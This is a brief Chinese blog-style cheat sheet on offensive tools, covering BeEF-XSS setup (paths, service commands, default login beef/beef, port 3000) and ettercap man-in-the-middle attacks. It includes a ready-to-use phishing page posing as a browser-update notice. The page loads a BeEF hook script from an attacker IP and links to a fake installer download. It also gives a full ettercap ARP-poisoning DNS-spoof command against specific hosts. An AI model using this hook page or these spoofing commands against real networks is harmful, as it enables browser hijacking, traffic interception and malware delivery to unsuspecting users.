标签:port 开启 结果 text share 启动 图形化 font ice
系统源文件 vi /etc/apt/sources.list
route -n 查看网关/子网掩码
beef-xss
安装路径 cd /usr/share/beef-xss/
启动 ./beef
配置文件 config.yaml
通过服务开启/关闭
systemctl start beef-xss.service
systemctl stop beef-xss.service
systemctl restart beef-xss.service
默认账号 beef/beef
后台路径 /ui/authentication
默认端口 3000
Hook链接 "<html>
<head>
<script src=""10.18.100.54:3000/hook.js""></script>
<title>浏览器更新</title>
<style>
#fsd{
color:blue;
text-align:center;
font-family:30px;
}
</style>
</head>
<body>
<div id=""fsd"">
<h3>您的浏览器版本过低,请及时更新!</h3>
<h3>如若您不更新可能会影响到您的浏览,导致一些功能无法正常使用</h3>
<h3>浏览器更新:</h3>
<a href=""""360安全浏览器.exe"">点我下载最新版本浏览器</a>
</div>
</body>
</html>"
ettercap(基于arp欺骗)
版本 ettercap -v
图形化界面 ettercap -G
Unified sniffing 嗅探所有
Hosts->host list 查看嗅探结果(ip/mac)
中间人攻击方法
ARP欺骗
icmp 重定向
port stealing
DHCP 欺骗
NDP poisoning
配置文件 /etc/ettercap/etter.dns
DNS欺骗 ettercap -i eth0 -Tp -M arp:remote -P dns_spoof /192.168.127.211// /192.168.127.2//
标签:port 开启 结果 text share 启动 图形化 font ice
原文地址:https://www.cnblogs.com/AtesetEnginner/p/11194055.html
